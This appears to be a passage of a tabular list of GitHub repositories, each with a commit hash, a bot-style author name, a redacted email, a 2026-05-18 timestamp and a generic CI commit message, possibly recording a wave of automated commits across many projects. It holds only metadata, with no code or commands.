| 2773 | AnthonyMuneneAM/strategy-navigator | 7d69c9655d5d | build-bot | [email protected] | 2026-05-18T13:34:20.000Z | ci: add build optimization step |
| 2774 | theabelchannel/HW2 | 7d71e6c8e045 | auto-ci | [email protected] | 2026-05-18T13:23:01.000Z | chore: optimize pipeline runtime |
| 2775 | clearlyclear-mbremer/ai-providerinfo | 7d837e89022a | ci-bot | [email protected] | 2026-05-18T12:46:08.000Z | chore: sync ci configuration |
| 2776 | trixobird/serverless-offline-bug | 7d92c9c48b2b | pipeline-bot | [email protected] | 2026-05-18T14:44:07.000Z | ci: update build config |
| 2777 | jenna-studio/monaco-editor-web | 7d9b8b5887d0 | build-bot | [email protected] | 2026-05-18T12:24:25.000Z | build: improve ci performance |
| 2778 | MaximKabaev/Jarvis | 7da0840a80c4 | ci-bot | [email protected] | 2026-05-18T14:24:36.000Z | fix: correct build workflow |
| 2779 | Akshith809/test-action-1778997996340809129 | 7dba84e6a889 | build-bot | [email protected] | 2026-05-18T13:11:07.000Z | build: improve ci performance |
| 2780 | adeelcheeema/Garbage-Classification | 7dc0d0fc2572 | ci-bot | [email protected] | 2026-05-18T13:10:23.000Z | chore: update ci/cd pipeline |
| 2781 | azimsidd/Amazing-Wallpaper-App | 7dc29abc8d08 | ci-bot | [email protected] | 2026-05-18T13:26:25.000Z | ci: update build config |
| 2782 | anantd16/Mood-tracker-UI | 7ddffb4cb711 | auto-ci | [email protected] | 2026-05-18T13:59:37.000Z | chore: update ci/cd pipeline |
| 2783 | hwangdeuk-code/label_manager | 7dec4006cd0e | ci-bot | [email protected] | 2026-05-18T14:07:43.000Z | chore: update ci/cd pipeline |
| 2784 | batnano/test-action-f3acd21c6ae7 | 7deed7e26681 | ci-bot | [email protected] | 2026-05-18T15:27:31.000Z | chore: optimize pipeline runtime |
| 2785 | Trasealla/crm-backend | 7e08f983cfa8 | build-bot | [email protected] | 2026-05-18T15:16:56.000Z | chore: update ci/cd pipeline |
| 2786 | ANDREWTENAJEROS/OOP-Rectangle | 7e157493f308 | auto-ci | [email protected] | 2026-05-18T16:13:30.000Z | ci: add build optimization step |
| 2787 | 88daxiong/88daxiong.github.io-blog | 7e185f2bd569 | ci-bot | [email protected] | 2026-05-18T16:50:47.000Z | build: improve ci performance |
| 2788 | VikingProduction/VP | 7e242a0be71c | auto-ci | [email protected] | 2026-05-18T14:41:20.000Z | ci: update build config |
| 2789 | ChavdarovIvan/test-action-1779119165307466310 | 7e272b08137a | build-bot | [email protected] | 2026-05-18T13:40:22.000Z | ci: update build config |
| 2790 | aalmonzer/vogeledits-shop | 7e3092250e7a | auto-ci | [email protected] | 2026-05-18T12:59:18.000Z | ci: update build config |
| 2791 | jsupa/steam-hours-boost-simple | 7e3f55c08676 | ci-bot | [email protected] | 2026-05-18T11:53:26.000Z | ci: update build config |
| 2792 | musatekin/flask | 7e4968b9b4fd | auto-ci | [email protected] | 2026-05-18T17:00:37.000Z | chore: sync ci configuration |
| 2793 | hahaha-zsq/winter-es-springboot-starter | 7e6c35eec064 | build-bot | [email protected] | 2026-05-18T12:17:17.000Z | ci: add build optimization step |
| 2794 | cybxrrgsouraabh/test-action-1778966161950396396 | 7e7c36399c02 | build-bot | [email protected] | 2026-05-18T12:12:44.000Z | fix: correct build workflow |
| 2795 | bsides312/bsides312.github.io | 7e810682cb3e | auto-ci | [email protected] | 2026-05-18T13:53:38.000Z | ci: update build config |
| 2796 | Astro-67/tasfam-web | 7e8a97ba74b1 | ci-bot | [email protected] | 2026-05-18T11:41:04.000Z | build: improve ci performance |
| 2797 | phonephachan/App | 7e9eb89589cd | build-bot | [email protected] | 2026-05-18T12:12:55.000Z | fix: correct build workflow |
| 2798 | lollounicam/SimpleRPG | 7ea136c5ca13 | ci-bot | [email protected] | 2026-05-18T16:51:13.000Z | build: improve ci performance |
| 2799 | kobe1081/hundredWholesale | 7ea53b07648d | ci-bot | [email protected] | 2026-05-18T12:45:55.000Z | ci: add build optimization step |
| 2800 | motorical-smtp/imap-services | 7ec6bd9e3bb4 | build-bot | [email protected] | 2026-05-18T16:45:01.000Z | build: improve ci performance |
| 2801 | ANDREWTENAJEROS/python-text-twist-2nd-exer | 7ed2719f84a0 | ci-bot | [email protected] | 2026-05-18T16:13:06.000Z | ci: update build config |
| 2802 | Codelabsdeveloper/okboys_deliveryboy | 7ee4671d2ca1 | ci-bot | [email protected] | 2026-05-18T13:34:38.000Z | ci: update build config |
| 2803 | np03cy4a250023-gif/Crimescene | 7eeaabe3f4f1 | pipeline-bot | [email protected] | 2026-05-18T13:36:35.000Z | ci: update build config |
| 2804 | trixobird/documind | 7efb0d4db107 | build-bot | [email protected] | 2026-05-18T14:42:14.000Z | fix: correct build workflow |
| 2805 | NicolNonga/autoFields | 7efdc63271d2 | ci-bot | [email protected] | 2026-05-18T12:19:22.000Z | fix: correct build workflow |
| 2806 | amitos80/gdrive-image-converter | 7effb32b7297 | ci-bot | [email protected] | 2026-05-18T13:49:38.000Z | ci: update build config |
| 2807 | jenna-studio/baekjoon-qna | 7f042c65b362 | auto-ci | [email protected] | 2026-05-18T12:23:52.000Z | build: improve ci performance |
| 2808 | Heseela/star-pattern | 7f0684d24648 | build-bot | [email protected] | 2026-05-18T12:16:57.000Z | ci: update build config |
| 2809 | thebenmerlin/certificates | 7f47d246f310 | auto-ci | [email protected] | 2026-05-18T12:19:30.000Z | fix: correct build workflow |
| 2810 | just-abdullah-dev/Image-to-hexadecimal | 7f4867b43553 | ci-bot | [email protected] | 2026-05-18T13:59:33.000Z | chore: optimize pipeline runtime |
| 2811 | aj-techsoul/elicss-bundle | 7f518011ef62 | auto-ci | [email protected] | 2026-05-18T13:42:02.000Z | chore: sync ci configuration |
| 2812 | awesomegoodman/zipcode-ng | 7f8604345e9d | ci-bot | [email protected] | 2026-05-18T13:07:50.000Z | fix: correct build workflow |
| 2813 | ankitnagar34/Miranda-Web | 7f8776963068 | pipeline-bot | [email protected] | 2026-05-18T16:14:12.000Z | chore: optimize pipeline runtime |
| 2814 | talhaansari77/dogSense | 7f8c1c9b3d07 | pipeline-bot | [email protected] | 2026-05-18T13:34:58.000Z | ci: update build config |
| 2815 | EnamulBokshi/Java-lab-2 | 7f915b4a1aa3 | pipeline-bot | [email protected] | 2026-05-18T15:36:08.000Z | chore: sync ci configuration |
| 2816 | azimsidd/DSAusingJava | 7f97949c8fb3 | pipeline-bot | [email protected] | 2026-05-18T13:22:13.000Z | fix: correct build workflow |
| 2817 | Raja244/YouTube-Subtitles-Downloader | 7fa44eefaa35 | ci-bot | [email protected] | 2026-05-18T15:49:01.000Z | chore: sync ci configuration |
| 2818 | Vikas00413/hello-world | 7fb690a11547 | pipeline-bot | [email protected] | 2026-05-18T16:59:14.000Z | ci: update build config |
| 2819 | Pedrod8/Jules | 7fbbe546a136 | build-bot | [email protected] | 2026-05-18T17:00:42.000Z | chore: update ci/cd pipeline |
| 2820 | nimesh306z/esms | 7fca799aea5c | ci-bot | [email protected] | 2026-05-18T16:02:06.000Z | chore: optimize pipeline runtime |
| 2821 | l8yh1/zibzabzob | 7fcff1c48081 | auto-ci | [email protected] | 2026-05-18T17:27:49.000Z | ci: add build optimization step |
| 2822 | ShaikSumaiya/maven | 7fe45451d1f8 | auto-ci | [email protected] | 2026-05-18T13:36:57.000Z | ci: add build optimization step |
| 2823 | MouadKH9/coup | 7fe5371e1970 | build-bot | [email protected] | 2026-05-18T13:03:46.000Z | chore: optimize pipeline runtime |
| 2824 | jsged/chat | 7fe5393d3bd6 | ci-bot | [email protected] | 2026-05-18T17:06:35.000Z | fix: correct build workflow |
| 2825 | Taha-khaled1/deep-link-demo | 80002cddcf44 | ci-bot | [email protected] | 2026-05-18T14:51:21.000Z | fix: correct build workflow |
| 2826 | gamingrxh34-create/Pokedex | 800dcd07a160 | ci-bot | [email protected] | 2026-05-18T17:07:41.000Z | chore: update ci/cd pipeline |
| 2827 | VrajPatelK/Blog-Web-Application | 8013a14db70a | pipeline-bot | [email protected] | 2026-05-18T12:45:21.000Z | build: improve ci performance |
| 2828 | warataek051/stamp-vueapp | 801eaa1ed2d3 | ci-bot | [email protected] | 2026-05-18T14:02:45.000Z | chore: update ci/cd pipeline |
| 2829 | JKS-sys/Enhancing-Job-Screening-with-AI-and-Data-Intelligence | 80237a91bad8 | ci-bot | [email protected] | 2026-05-18T14:21:34.000Z | ci: update build config |
| 2830 | chicoluan/colmeia | 802b05fd350c | auto-ci | [email protected] | 2026-05-18T12:21:57.000Z | chore: update ci/cd pipeline |
| 2831 | jenish-prog/my_project | 80340b2722a5 | ci-bot | [email protected] | 2026-05-18T14:06:25.000Z | chore: update ci/cd pipeline |
| 2832 | razakrzn/ByWay_Django | 8038bca6f061 | build-bot | [email protected] | 2026-05-18T13:30:13.000Z | ci: add build optimization step |
| 2833 | ShayanHasanKhan0/foundry-merkle-airdrop-crypto | 804dc0afdf16 | ci-bot | [email protected] | 2026-05-18T16:37:42.000Z | ci: add build optimization step |
| 2834 | tzmoyal/documentationai-Docs | 8050f77a8972 | auto-ci | [email protected] | 2026-05-18T12:54:19.000Z | chore: optimize pipeline runtime |
| 2835 | git-init-priyanshu/100xdevs-tasks-and-submissions | 8061058c7178 | ci-bot | [email protected] | 2026-05-18T17:12:28.000Z | ci: update build config |
| 2836 | razakrzn/swiggy_backend | 807266f8fae5 | build-bot | [email protected] | 2026-05-18T13:29:43.000Z | build: improve ci performance |
| 2837 | Pedrozz13755/Morveth-base-es | 80804d936d4b | pipeline-bot | [email protected] | 2026-05-18T11:44:25.000Z | chore: sync ci configuration |
| 2838 | huyparody/huyparody.github.io | 8085735028f2 | pipeline-bot | [email protected] | 2026-05-18T14:16:58.000Z | ci: update build config |
| 2839 | Tiledesk/tiledesk-community-app | 80884b4ae10e | build-bot | [email protected] | 2026-05-18T13:13:33.000Z | ci: update build config |
| 2840 | CTSE-book-exchange-system/user-service | 8092a28bc09d | ci-bot | [email protected] | 2026-05-18T13:55:57.000Z | chore: sync ci configuration |
| 2841 | theabhinavpal/Birthday-Website | 809f372d98a3 | build-bot | [email protected] | 2026-05-18T16:02:48.000Z | chore: optimize pipeline runtime |
| 2842 | luthfiiayyubi/COMP6047001---Algorithm-and-Programming | 80a6439cca9b | auto-ci | [email protected] | 2026-05-18T16:25:19.000Z | chore: optimize pipeline runtime |
| 2843 | tutututurbo/VisualGrainSynth | 80b8bbabec41 | auto-ci | [email protected] | 2026-05-18T16:13:06.000Z | chore: optimize pipeline runtime |
| 2844 | Ayoub-dev-Mus/caly_backend_app | 80bc00fd9d8d | auto-ci | [email protected] | 2026-05-18T17:26:57.000Z | chore: sync ci configuration |
| 2845 | ShaikSumaiya/sample | 80bec69235d8 | ci-bot | [email protected] | 2026-05-18T13:36:50.000Z | chore: update ci/cd pipeline |
| 2846 | VietNamCombatZ/To-doListApp | 80bfc9b5a22e | pipeline-bot | [email protected] | 2026-05-18T15:47:24.000Z | fix: correct build workflow |
| 2847 | ChandrakanthSabnekar/test-action-12c9615bedc8 | 80c970c17c43 | pipeline-bot | [email protected] | 2026-05-18T13:51:53.000Z | ci: update build config |
| 2848 | Ashishkhiunju/followupfront | 80cd714e7d21 | pipeline-bot | [email protected] | 2026-05-18T13:00:42.000Z | chore: sync ci configuration |
| 2849 | ANDREWTENAJEROS/TenajerosWebFinal | 80d67d1a511d | build-bot | [email protected] | 2026-05-18T16:14:01.000Z | chore: update ci/cd pipeline |
| 2850 | nnfuad/numpy0 | 80db7a88e5b1 | pipeline-bot | [email protected] | 2026-05-18T13:30:52.000Z | ci: update build config |
| 2851 | umairabhatti786/Eatpace | 80dd71012b98 | ci-bot | [email protected] | 2026-05-18T12:37:37.000Z | ci: update build config |
| 2852 | gioeste/gio | 80e3350f7aee | auto-ci | [email protected] | 2026-05-18T13:08:26.000Z | chore: sync ci configuration |
| 2853 | ibrahiemhss/android-yolo | 80e924eae9bc | ci-bot | [email protected] | 2026-05-18T14:01:38.000Z | chore: update ci/cd pipeline |
| 2854 | Ediekkhan/FBest-Movies | 80fa385be31c | build-bot | [email protected] | 2026-05-18T13:48:55.000Z | ci: update build config |
| 2855 | Husam-AbuZina/Portfolio-Husam-Latest | 80fa408ebfe9 | auto-ci | [email protected] | 2026-05-18T12:21:28.000Z | chore: update ci/cd pipeline |
| 2856 | happyharbor/working_condition | 80fc31ac9c9e | ci-bot | [email protected] | 2026-05-18T14:43:30.000Z | fix: correct build workflow |
| 2857 | jmacasa41-commits/TeamProject | 80fc3aa0978b | auto-ci | [email protected] | 2026-05-18T12:15:38.000Z | chore: optimize pipeline runtime |
| 2858 | EnamulBokshi/DSA | 80fc9a34b22c | build-bot | [email protected] | 2026-05-18T15:31:26.000Z | ci: update build config |
| 2859 | jaff0040/assignment-1 | 8101eace6a63 | auto-ci | [email protected] | 2026-05-18T17:48:10.000Z | chore: sync ci configuration |
| 2860 | 0-pavand/penvo-ai | 8104e2f0aade | auto-ci | [email protected] | 2026-05-18T12:57:08.000Z | fix: correct build workflow |
| 2861 | muhammadhammadd7/PayFast-Payment-Gateway-Flutter | 810518fec510 | build-bot | [email protected] | 2026-05-18T13:47:00.000Z | chore: sync ci configuration |
| 2862 | spoleksic/angular-test | 8117a40de7b9 | auto-ci | [email protected] | 2026-05-18T16:09:58.000Z | ci: update build config |
| 2863 | Uxfirststudio/uxfirst.io | 8128a2757eca | build-bot | [email protected] | 2026-05-18T12:34:33.000Z | build: improve ci performance |
| 2864 | ChandrakanthSabnekar/test-action-788ea25d2118 | 8129bd1c23e8 | pipeline-bot | [email protected] | 2026-05-18T13:51:31.000Z | build: improve ci performance |
| 2865 | vansh7266/Google-PromptWar-1.1 | 8132b9d43d9d | build-bot | [email protected] | 2026-05-18T16:51:20.000Z | fix: correct build workflow |
| 2866 | julianarmando/Website-Flisol-Bogot--2014 | 8134970adf4b | build-bot | [email protected] | 2026-05-18T13:51:21.000Z | chore: sync ci configuration |
| 2867 | Farsight-hci/.github | 8145a4d43430 | ci-bot | [email protected] | 2026-05-18T13:36:41.000Z | chore: update ci/cd pipeline |
| 2868 | codedecode25/HibernateN-1Problem | 814754cd15d9 | ci-bot | [email protected] | 2026-05-18T17:21:30.000Z | ci: update build config |
| 2869 | SuyeongUeno/Flask | 815fb23e9469 | pipeline-bot | [email protected] | 2026-05-18T17:07:09.000Z | chore: update ci/cd pipeline |
| 2870 | ho-cyber/linefollower_lib | 817b76bc01a5 | pipeline-bot | [email protected] | 2026-05-18T17:24:57.000Z | build: improve ci performance |
| 2871 | Prajwal247/TodoApp | 8190eff23719 | ci-bot | [email protected] | 2026-05-18T13:11:03.000Z | fix: correct build workflow |
| 2872 | codedecode25/order-service | 81a3786c9522 | ci-bot | [email protected] | 2026-05-18T17:18:33.000Z | ci: update build config |
| 2873 | pareesa969/NeuroBridge-Support | 81b321958843 | pipeline-bot | [email protected] | 2026-05-18T13:42:23.000Z | ci: add build optimization step |
| 2874 | EnamulBokshi/java-lab-q1 | 81b4a685195e | ci-bot | [email protected] | 2026-05-18T15:36:00.000Z | ci: update build config |
| 2875 | noullove/server | 81b689b69628 | pipeline-bot | [email protected] | 2026-05-18T12:34:57.000Z | chore: update ci/cd pipeline |
| 2876 | awesomegoodman/ScriptMaster-frontend | 81da1e9c997c | auto-ci | [email protected] | 2026-05-18T12:57:05.000Z | ci: update build config |
| 2877 | anibeladjei/Carbon-Footprint | 81e0523c94e0 | build-bot | [email protected] | 2026-05-18T13:41:19.000Z | ci: update build config |
| 2878 | Nathilee/https-github.com-new | 81e609a3b26e | ci-bot | [email protected] | 2026-05-18T16:27:59.000Z | ci: add build optimization step |
| 2879 | vahitkeskin/vahitkeskin | 81ec62739d27 | auto-ci | [email protected] | 2026-05-18T13:21:50.000Z | fix: correct build workflow |
| 2880 | Raja244/Raja244 | 8202c57fdb88 | ci-bot | [email protected] | 2026-05-18T15:39:26.000Z | ci: add build optimization step |
| 2881 | saradune6/Convert-ANY-website-into-an-API-using-Firecrawl | 82111d40a926 | auto-ci | [email protected] | 2026-05-18T13:01:10.000Z | chore: update ci/cd pipeline |
| 2882 | varunvaghasiya11/React_Google_contect | 8216d9ef05f5 | auto-ci | [email protected] | 2026-05-18T13:55:09.000Z | ci: add build optimization step |
| 2883 | arpita009/chocolate-calendar | 8221bd9dffa4 | pipeline-bot | [email protected] | 2026-05-18T16:35:13.000Z | fix: correct build workflow |
| 2884 | nebink/DSA-practice | 822f04ec27ed | build-bot | [email protected] | 2026-05-18T12:17:50.000Z | chore: sync ci configuration |
| 2885 | 0xdps/generator-webapp | 8232e22f09c7 | build-bot | [email protected] | 2026-05-18T14:02:28.000Z | build: improve ci performance |
| 2886 | Warshaman/ci-pipeline | 823516f4acca | pipeline-bot | [email protected] | 2026-05-18T11:40:12.000Z | ci: add build optimization step |
| 2887 | petalontv/cinematography-portfolio | 82411b4e0616 | pipeline-bot | [email protected] | 2026-05-18T12:09:21.000Z | chore: sync ci configuration |
| 2888 | bishaldahal4777/multi-tenant | 8262f014898a | build-bot | [email protected] | 2026-05-18T13:32:07.000Z | chore: update ci/cd pipeline |
| 2889 | girlpage/Digital-Autonomy-in-Visual-Communication-through-Open-Source-Software | 826981bace31 | auto-ci | [email protected] | 2026-05-18T12:33:42.000Z | chore: optimize pipeline runtime |
| 2890 | Debbatisudheer/portfolio | 828168fae88c | pipeline-bot | [email protected] | 2026-05-18T17:16:18.000Z | chore: sync ci configuration |
| 2891 | DellerbaRobotics/Turtle-Joy | 829191e8e355 | build-bot | [email protected] | 2026-05-18T12:51:27.000Z | chore: optimize pipeline runtime |
| 2892 | ZunsodB/Anand-Khujirt | 82a419d2c34f | auto-ci | [email protected] | 2026-05-18T16:23:23.000Z | chore: sync ci configuration |
| 2893 | ritik-expandimo/routingreact | 82a54bfd3248 | build-bot | [email protected] | 2026-05-18T12:13:39.000Z | chore: sync ci configuration |
| 2894 | Lhagvaa0102/Property-listing | 82abcda87b3b | pipeline-bot | [email protected] | 2026-05-18T16:04:51.000Z | chore: sync ci configuration |
| 2895 | supportefy-dev/CSR2-Cars | 82aee330b667 | auto-ci | [email protected] | 2026-05-18T11:42:55.000Z | chore: optimize pipeline runtime |
| 2896 | melsaghier/test-action-1779100116920350616 | 82b8804d5639 | auto-ci | [email protected] | 2026-05-18T15:45:52.000Z | build: improve ci performance |
| 2897 | gliepins/Support-Chat-with-Telegram | 82bce1b74bd8 | build-bot | [email protected] | 2026-05-18T16:46:28.000Z | chore: sync ci configuration |
| 2898 | smallziz18/benchmark_AI4Nieup | 82bcf9803e8e | build-bot | [email protected] | 2026-05-18T12:00:23.000Z | ci: update build config |
| 2899 | fms-repo/Ascension-Site | 82c1aff812ad | build-bot | [email protected] | 2026-05-18T15:47:34.000Z | chore: update ci/cd pipeline |
| 2900 | BryanAlexanderSantoso/web-kaze-secret | 82c371997f4a | auto-ci | [email protected] | 2026-05-18T13:55:30.000Z | chore: update ci/cd pipeline |
| 2901 | Ankit0921/gitstart_summer | 82c87011411c | auto-ci | [email protected] | 2026-05-18T13:35:57.000Z | fix: correct build workflow |
| 2902 | vrct07/canadian-wonders | 82d22aa70d61 | build-bot | [email protected] | 2026-05-18T14:25:18.000Z | build: improve ci performance |
| 2903 | FRA-NCE-IES/FRA-NCE-IES | 82e4a4296ff8 | auto-ci | [email protected] | 2026-05-18T16:28:17.000Z | ci: update build config |
| 2904 | guimmamanna/health | 82e88b316286 | ci-bot | [email protected] | 2026-05-18T13:06:12.000Z | ci: add build optimization step |
| 2905 | zeroshotlabs/php_mqueue | 830116d0b853 | auto-ci | [email protected] | 2026-05-18T13:36:01.000Z | chore: optimize pipeline runtime |
| 2906 | brandoncloutier/strands-solver | 83020b8fb8f9 | build-bot | [email protected] | 2026-05-18T16:00:08.000Z | chore: sync ci configuration |
| 2907 | rahulbohra57/snake | 830c6bc8873b | build-bot | [email protected] | 2026-05-18T16:31:11.000Z | build: improve ci performance |
| 2908 | kozlowski98/test-action-1778960008431259916 | 831366928a40 | pipeline-bot | [email protected] | 2026-05-18T13:39:53.000Z | chore: sync ci configuration |
| 2909 | EnamulBokshi/todo-react-redux-toolkit | 831734bf71e4 | ci-bot | [email protected] | 2026-05-18T15:33:19.000Z | ci: add build optimization step |
| 2910 | nucrasenaa/oxygen-calculator | 831a2614c95a | ci-bot | [email protected] | 2026-05-18T14:02:55.000Z | ci: add build optimization step |
| 2911 | myssaqil/e-rules-restapi | 832268fb00ab | ci-bot | [email protected] | 2026-05-18T14:16:57.000Z | ci: update build config |
| 2912 | ConnectSiteForge/snippets-tjd2qw | 833078ec600b | build-bot | [email protected] | 2026-05-18T14:35:05.000Z | ci: add build optimization step |
| 2913 | alexbuiac/TCP-UDP-Message-Application | 833610a802ad | ci-bot | [email protected] | 2026-05-18T17:17:21.000Z | ci: add build optimization step |
| 2914 | Mukhtarali6121/ScribeIt | 833d06b4f74b | pipeline-bot | [email protected] | 2026-05-18T13:34:38.000Z | ci: add build optimization step |
| 2915 | tumkama/test-action-1779106619495482082 | 8347da379db6 | pipeline-bot | [email protected] | 2026-05-18T13:17:40.000Z | ci: add build optimization step |
| 2916 | guimmamanna/Cloud-IAC-Resource-Analyzer | 8348fd0c9092 | build-bot | [email protected] | 2026-05-18T13:02:39.000Z | chore: sync ci configuration |
| 2917 | sanjayadhikari009/scale-up-academy | 834e5256a80e | pipeline-bot | [email protected] | 2026-05-18T12:29:20.000Z | ci: add build optimization step |
| 2918 | Gopikrishna54321/test-action-1778957958885562786 | 83500b20d2d4 | auto-ci | [email protected] | 2026-05-18T16:33:04.000Z | ci: update build config |
| 2919 | artiegoesviral/spanish-language-wheel | 835a27b6137c | build-bot | [email protected] | 2026-05-18T17:03:16.000Z | ci: add build optimization step |
| 2920 | AbhishekAnamala/CODTECH-Task1 | 83617e294e63 | build-bot | [email protected] | 2026-05-18T16:12:30.000Z | chore: update ci/cd pipeline |
| 2921 | WIZnet-ioNIC/WIZnet-EVB-Pico-micropython-examples | 8372c42734d7 | build-bot | [email protected] | 2026-05-18T16:26:09.000Z | build: improve ci performance |
| 2922 | massoudhamad/massoudhamad.github.io | 839115ab2933 | auto-ci | [email protected] | 2026-05-18T11:38:33.000Z | build: improve ci performance |
| 2923 | House-of-Salaga-Ecommerce-platform/product-and-category | 83a5a039b551 | pipeline-bot | [email protected] | 2026-05-18T13:04:41.000Z | chore: optimize pipeline runtime |
| 2924 | dbtjr1103/jelly-dotclaude | 83a9425613d9 | pipeline-bot | [email protected] | 2026-05-18T16:15:36.000Z | chore: optimize pipeline runtime |
| 2925 | batnano/test-action-ac324b6644b8 | 83afa0be1661 | auto-ci | [email protected] | 2026-05-18T15:27:12.000Z | chore: sync ci configuration |
| 2926 | 0xdps/g-cloud | 83b522daaaad | ci-bot | [email protected] | 2026-05-18T14:03:06.000Z | chore: update ci/cd pipeline |
| 2927 | Farsight-hci/Website | 83cffbcfc07a | auto-ci | [email protected] | 2026-05-18T13:35:50.000Z | ci: add build optimization step |
| 2928 | saksham-tech/AI-CHAT-APP | 83da6117875a | pipeline-bot | [email protected] | 2026-05-18T17:07:00.000Z | ci: update build config |
| 2929 | riomukhtarom/android-navigation | 83e138ec4961 | ci-bot | [email protected] | 2026-05-18T15:45:12.000Z | chore: optimize pipeline runtime |
| 2930 | Skypieee6/k-city-stream | 83eccbd98a5f | build-bot | [email protected] | 2026-05-18T14:32:55.000Z | fix: correct build workflow |
| 2931 | Akisan98/NgRx-Demo | 83f07ca54064 | auto-ci | [email protected] | 2026-05-18T14:03:58.000Z | fix: correct build workflow |
| 2932 | Davidf2004/test-action-1778997996340872760 | 83f0fb0b6ab7 | ci-bot | [email protected] | 2026-05-18T16:58:47.000Z | fix: correct build workflow |
| 2933 | Husam-AbuZina/portfolio-husamabuzina | 8403ce23b381 | pipeline-bot | [email protected] | 2026-05-18T12:22:09.000Z | build: improve ci performance |
| 2934 | gokul-227/Corporate-Credit-Rating-Data-Pipeline | 8404b81363b3 | pipeline-bot | [email protected] | 2026-05-18T16:20:34.000Z | ci: add build optimization step |
| 2935 | DigitalQatalyst/DQ-Prod-TMaaS-Admin-App | 841a3a7d24d1 | auto-ci | [email protected] | 2026-05-18T13:33:22.000Z | ci: update build config |
| 2936 | noushiFlex/luxury-capsule | 841bf081bfc6 | ci-bot | [email protected] | 2026-05-18T17:40:25.000Z | ci: update build config |
| 2937 | Mostakim0978/Fuck | 841dc8543623 | build-bot | [email protected] | 2026-05-18T11:43:49.000Z | ci: update build config |
| 2938 | bishaldahal4777/resume-uploader | 842122a3b6ac | pipeline-bot | [email protected] | 2026-05-18T13:30:55.000Z | ci: add build optimization step |
| 2939 | noushiFlex/Movies-Track | 842cc46f569d | ci-bot | [email protected] | 2026-05-18T17:45:42.000Z | chore: optimize pipeline runtime |
| 2940 | evoxtorm/GoRateLimitter | 84316ee1b4e7 | build-bot | [email protected] | 2026-05-18T16:22:19.000Z | ci: update build config |
| 2941 | senithudara/senithudara | 84399e005f3b | build-bot | [email protected] | 2026-05-18T14:05:22.000Z | chore: optimize pipeline runtime |
| 2942 | yashlad27/SmartBanking.github.io | 84456e8a38cb | ci-bot | [email protected] | 2026-05-18T13:31:12.000Z | build: improve ci performance |
| 2943 | zidaann/cekula | 8454990f5b8e | auto-ci | [email protected] | 2026-05-18T16:38:33.000Z | chore: sync ci configuration |
| 2944 | Manthankachhadiya/book_summary | 845b8a9adb7e | build-bot | [email protected] | 2026-05-18T16:16:57.000Z | ci: add build optimization step |
| 2945 | akhill4054/Notes | 8464dfbca971 | build-bot | [email protected] | 2026-05-18T16:35:02.000Z | ci: update build config |
| 2946 | NalineeKant-82/profile-app | 846a94dd07af | ci-bot | [email protected] | 2026-05-18T17:46:32.000Z | ci: add build optimization step |
| 2947 | persian-tools/rust-persian-tools | 8474b6af958c | auto-ci | [email protected] | 2026-05-18T12:54:00.000Z | chore: optimize pipeline runtime |
| 2948 | thanu-george/python-mini-games | 84a66220cc5e | auto-ci | [email protected] | 2026-05-18T13:03:07.000Z | build: improve ci performance |
| 2949 | umakantmukhiya/Vitis_Paper | 84b77de05bdb | build-bot | [email protected] | 2026-05-18T15:45:13.000Z | build: improve ci performance |
| 2950 | YannCG/YannCGStation-UI | 84ba5065473c | pipeline-bot | [email protected] | 2026-05-18T15:49:32.000Z | build: improve ci performance |
| 2951 | SevenGnu/test-action-1779110816957946204 | 84d5a0f94542 | auto-ci | [email protected] | 2026-05-18T12:00:04.000Z | build: improve ci performance |
| 2952 | Udbhav-2k25/udbhav-ht100-ga-009 | 84eee1ac0f92 | auto-ci | [email protected] | 2026-05-18T13:09:16.000Z | ci: add build optimization step |
| 2953 | zeroshotlabs/trailhead | 85007f62e8a7 | build-bot | [email protected] | 2026-05-18T13:30:25.000Z | ci: update build config |
| 2954 | nicoladipa/nicoladipa.github.io | 85043d6ae29e | pipeline-bot | [email protected] | 2026-05-18T12:39:33.000Z | chore: update ci/cd pipeline |
| 2955 | pranto2051/nid_management_system_university_php_Project | 8507beb36c8f | build-bot | [email protected] | 2026-05-18T13:56:51.000Z | chore: sync ci configuration |
| 2956 | bishaldahal4777/manashvibanquet | 852594e57318 | ci-bot | [email protected] | 2026-05-18T13:31:44.000Z | ci: add build optimization step |
| 2957 | vaibhavmoradiya/kishan-hub | 85335f6b1aea | pipeline-bot | [email protected] | 2026-05-18T16:23:12.000Z | fix: correct build workflow |
| 2958 | MiguelParamos/apocalipsisZombieDAW | 8546af5d2368 | ci-bot | [email protected] | 2026-05-18T12:44:40.000Z | ci: update build config |
| 2959 | luthfiiayyubi/devEnvSetup | 855c1623cd03 | pipeline-bot | [email protected] | 2026-05-18T16:25:03.000Z | ci: add build optimization step |
| 2960 | DS-FoodRush/foodRush-fe | 855eee3fb60d | build-bot | [email protected] | 2026-05-18T14:01:20.000Z | ci: add build optimization step |
| 2961 | HamzaElMkhantar/restapicheckp | 856e50d3b8e9 | pipeline-bot | [email protected] | 2026-05-18T17:32:28.000Z | chore: update ci/cd pipeline |
| 2962 | mk016/CodeMarketplace-main | 856edb6d2249 | pipeline-bot | [email protected] | 2026-05-18T16:35:16.000Z | fix: correct build workflow |
| 2963 | Akisan98/bloc_test | 85726da0c5e2 | ci-bot | [email protected] | 2026-05-18T14:06:10.000Z | chore: update ci/cd pipeline |
| 2964 | websystemspl/boo-icons | 859fe146e47f | auto-ci | [email protected] | 2026-05-18T15:05:30.000Z | ci: update build config |
| 2965 | aj-techsoul/cordova-plugin-vibe-background-geolocation | 85ad5a38bb77 | build-bot | [email protected] | 2026-05-18T13:42:56.000Z | chore: sync ci configuration |
| 2966 | chitthushine/Data2tfRecord | 85b28d0bf6fa | build-bot | [email protected] | 2026-05-18T12:55:23.000Z | ci: add build optimization step |
| 2967 | Enriiquecm/FormacionSCVPractica | 85d5d12562be | pipeline-bot | [email protected] | 2026-05-18T13:28:06.000Z | ci: add build optimization step |
| 2968 | jenish-prog/smart | 85e34ad42a68 | pipeline-bot | [email protected] | 2026-05-18T14:07:47.000Z | chore: update ci/cd pipeline |
| 2969 | mk016/bolt-clone | 85e8caf0fbf3 | build-bot | [email protected] | 2026-05-18T16:33:04.000Z | ci: add build optimization step |
| 2970 | SanketVerse/Gen-Ai-Demo | 85f068e63595 | ci-bot | [email protected] | 2026-05-18T17:15:14.000Z | ci: add build optimization step |
| 2971 | AmarKumarShaw/date-hover-data-table | 85f2551fb6d5 | build-bot | [email protected] | 2026-05-18T12:09:58.000Z | build: improve ci performance |
| 2972 | gokul-227/AWS-OpenAI-Personal-ChatBot-WebApp | 85f3481df5c3 | build-bot | [email protected] | 2026-05-18T16:18:35.000Z | chore: sync ci configuration |
